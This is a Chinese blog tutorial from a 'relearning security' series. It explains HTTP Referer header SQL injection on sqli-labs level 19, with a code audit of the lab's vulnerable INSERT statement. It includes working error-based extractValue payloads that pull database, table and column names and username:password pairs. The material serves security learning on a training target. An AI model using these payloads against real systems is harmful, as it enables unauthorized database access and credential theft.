35岁重学网络安全——SQL注入篇(二十一)

最新推荐文章于 2025-09-04 17:22:08 发布
原创 最新推荐文章于 2025-09-04 17:22:08 发布 · 388 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #sql #安全 #sql注入

鲁迅先生曾经说过:做安全,先免责!

用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。

本文主要内容:HTTP头部注入——referer注入

referer注入

referer,即HTTP Referer是头部信息header的一部分,当浏览器向WEB服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
referer的正确拼写是referrer,由于早期HTTP规范的拼写错误,为了保持向后兼容就一直将错就错
常见用法:

  • 防盗链:如只允许自己的网站访问自己的图片服务器。
    • 自己的域名为www.abc.com,那么服务器每次提取到referer来判断是不是自己的域名,是就可以继续访问图片,不是就拦截请求
  • 防止恶意请求:静态请求以.html结尾,动态请求以shtml结尾。那么所有的动态请求,都可以referer为自己的网站
  • referer:空referer的定义为:referer头部的内容为空。或者,一个HTTP请求中不包含referer头部

代码审计

对靶场第19节的内容进行代码审计。源码中对网页输入的用户名和密码进行检查
在这里插入图片描述

check_input()函数中对用户名和密码进行了如下的检查
在这里插入图片描述

使用insert语句将referer的内容插入到数据库中
在这里插入图片描述

PS:靶场的开发者应该是偷懒了,VALUE的第一个参数应该是$referer,开发者应该是复制的前面关卡的代码,没有将$uagent改为$referer
在这里插入图片描述

其它问题

如果第19节网页中不回显报错信息,则将源码改为:mysqli_query($insert);,因为PHP7不支持mysql_query($insert);
在这里插入图片描述

靶场测试

原理分析

在上面的insert语句中包含VALUES ('$uagent', '$IP')";,其中带有$符号的为变量名,被用户输入的内容进行替代。

  • 假设referer的内容为' #,则VALUE中的变量被替换为VALUE('' #','$IP'),因为#为注释符,后面内容不起作用,则变为:VALUE('' #
  • 可以看出VALUE缺少第二参数和右侧的闭合括号,则将referer的内容改为:', 2)#,则完整内容为:VALUE('',2) #','$IP'),由于注释符#的原因,则真正起作用的是:VALUE('',2) #
  • 结合报错注入,则构造的referer的内容应该为:' or extractValue(1,concat('^',(select database()))),2)#

靶场实测

打开靶场第19节,使用Burp suite抓包
PS:一定要使用一个正确的用户名和密码进行登录
在这里插入图片描述

修改referer中的内容为:' or extractValue(1,concat('^',(select database()))),2)#,查询数据库名称
在这里插入图片描述

查询数据表名称、列名和数据

查询数据表名称:' or extractValue(1,concat('^',(select group_concat(table_name) from information_schema.tables where table_schema=database()))),2)#
在这里插入图片描述

查询数据列名称: ' or extractValue(1,concat('^',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))),2)#
在这里插入图片描述

查询数据信息:' or extractValue(1,concat('^',(select concat(username,':',password) from users limit 0,1))),2)#

  • 这里没有使用substr控制字符长度,而是使用了limit 0,1来逐条输出用户信息

在这里插入图片描述

无情的广告时间

哈哈哈哈,又到了大家喜欢的广告时间了,公众号:编码魔坊,喜欢的话给个关注呗,点击下方小卡片,扫码即可关注,谢谢您的关注!!!

24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 583
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
渗透测试之SQL注入(读写文件、dnslog盲注、宽字节注入、User-Agent注入Referer注入、Cookie注入、二次注入
Hi~ 土拨鼠
12-11 1472
文章目录读取文件操作写入文件操作宽字节注入Cookie注入 mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以利用SQL注入漏洞对文件进行读写(但前提是权限足够)。 前提条件: 当前用户具有文件权限,尽量具有root权限 查询是否有文件权限:select File_priv from mysql.user where user = 'root' and host = 'localhost'; secure_file_priv不为NULL secure_file_p
Web安全:你所不知道的HTTP Referer注入攻击
最新发布
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
09-04 1523
文章深入解析了HTTP Referer头的安全风险,重点介绍了Referer注入攻击,尤其是SQL注入的实现方式。文章通过sqli-labs实战演示,说明攻击者如何通过篡改Referer头执行恶意SQL代码,并强调防御的核心在于永不信任客户端输入,需进行严格校验、过滤和使用白名单机制,避免依赖Referer头做安全决策
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 5905
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1511
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
Web漏洞-SQL注入()
Ays.Ie的博客
03-06 1856
web漏洞—SQL注入(下)
关于SQL的各种注入
qq_73607577的博客
03-24 1934
SQL注入
35重学网络安全——SQL注入(十六)
Armey的博客
02-10 784
WEB页面只有一个正常页面。利用页面的响应时间,逐步猜解相关信息前提:数据库可以执行命令代码,只是前端页面不会产生任何的反馈信息。
35重学网络安全——SQL注入(十三)
Armey的博客
02-06 898
鲁迅先生曾经说过:做安全,先免责!用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。floor()报错注入基础(get型)
35重学网络安全——SQL注入(九)
Armey的博客
01-28 1078
concat()函数用于连接两个或多个字符串,生成一个新的字符串。利用报错信息,查询当前数据库concat('^',concat()函数解析;,使用()将第二参数包裹是为了优先运算。
35重学网络安全——SQL注入(十四)
Armey的博客
02-06 503
鲁迅先生曾经说过:做安全,先免责!用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。floor()报错注入实战(get型)
35重学网络安全——SQL注入(番外
Armey的博客
01-13 324
感觉这么文章单独发一次,会有些水,所以算作4.1吧本文内容:介绍几个后面实验会用到的工具:hackbarfoxy proxyBurpSuite。
Web安全SQL注入
weixin_52741673的博客
07-16 1484
Web安全SQL注入
Web安全攻防的学习——07—(MySQL注入读写文件、HTTP头中的SQL注入、HTTP User-Agent注入、HTTP Referer注入、cookie注入)(重点)
weixin_42118531的博客
03-04 688
1、MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行 对文件进行读写(前提是权限足够) 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 需要人为设置secure_file_priv的默认值 保存文件后重启Phpstudy2018,再验证 读取文件内容 http://12...
sql注入16-20
qq_45751902的博客
03-31 1857
16-20关的解释,新手的那些疑问
CTFHub - Refer注入
Have_a_great_day的博客
09-12 1216
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHUB技能树之SQL——Refer注入
weixin_73049307的博客
10-18 1108
看样子可能不在数据库中,老样子,改成-1 union select 1,2#但是出错了,换成kali的sqlmap试了试也还是不行,不知道什么原因。得知vjrnfqmoar表和news表。回显错误,说明是整数型注入。得知pnzslmlazg列。直接挑明是Refer注入。回显错误,说明字段数是2。得知数据库名是sqli。
sqli-lab靶场学习(六)——Less18-22(User-Agent、Referer、Cookie注入
sadoshi的专栏
02-11 1193
本关的注入点在User-Agent。我们在用户名和密码框中输入admin/admin后,会回显User-Agent的信息。注意这里只有输入了正确的密码才回回显。PS:如果admin/admin密码不对,就去Less17那里改就行了~~~~我们看一下源码,在less18目录下的index.php:分析代码后,我们发现uagent这个变量获取的是user-agent的数据,而注入点在103行这里,输出页面反馈的在109行。
堆叠注入,cookie注入,Base64注入,User agent注入Referer注入,DNS注入以及过狗
m0_48454948的博客
01-24 248
堆叠注入,cookie注入,Base64注入,User agent注入Referer注入,DNS注入以及过狗
SQL注入攻击与防御》——防范网络安全隐患
SQL注入攻击是网络应用安全领域中一个极为重要的安全威胁。这种攻击方式允许攻击者通过在应用程序中输入恶意的SQL语句,从而操纵数据库,获取、修改或删除敏感数据,甚至控制服务器。攻击者可能会利用SQL注入技术来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

道人禅(armey)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值